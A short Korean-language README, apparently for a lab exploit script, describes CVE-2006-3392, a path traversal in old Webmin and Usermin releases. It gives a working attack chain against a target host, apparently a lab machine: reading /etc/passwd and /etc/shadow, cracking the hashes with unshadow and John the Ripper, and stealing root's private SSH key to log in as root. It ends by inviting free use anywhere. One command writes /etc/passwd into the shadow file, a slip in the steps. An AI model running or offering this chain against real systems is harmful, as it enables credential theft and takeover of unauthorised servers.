
Webmin < 1.290 / Usermin < 1.220 - 임의 파일 노출
https://www.cvedetails.com/cve/CVE-2006-3392/
Webmin 1.290 이전 버전 및 Usermin 1.220 이전 버전은 HTML을 디코딩하기 전에 simplify_path 함수를 호출하여, 원격 공격자가 임의의 파일을 읽을 수 있습니다. 이는 "%01"과 같은 바이트가 파일 이름에서 제거되기 전에 "../" 시퀀스 제거를 우회하는 "..%01" 시퀀스를 사용하여 입증됩니다. 참고: 이는 CVE-2006-3274와 다른 문제입니다.
루트 권한으로 파일 시스템의 모든 파일 열람
./exploit.sh <target ip> <target port> <file to disclose>
10.10.11.105에서 passwd 및 shadow 열람, unshadow 및 해시 크랙
./exploit.sh 10.10.11.105 10000 /etc/passwd > passwd
./exploit.sh 10.10.11.105 10000 /etc/passwd > shadow
unshadow passwd shadow > unshadowed
john --wordlist=<your fave wordlist here> unshadowed
10.10.11.105에서 개인 RSA 키 열람
./exploit.sh 10.10.11.105 10000 /root/.ssh/id_rsa > private_key
chmod 600 ./private_key
ssh -i private_key [email protected]
원할 때마다 원하는 곳에서 자유롭게 사용하거나 수정하십시오.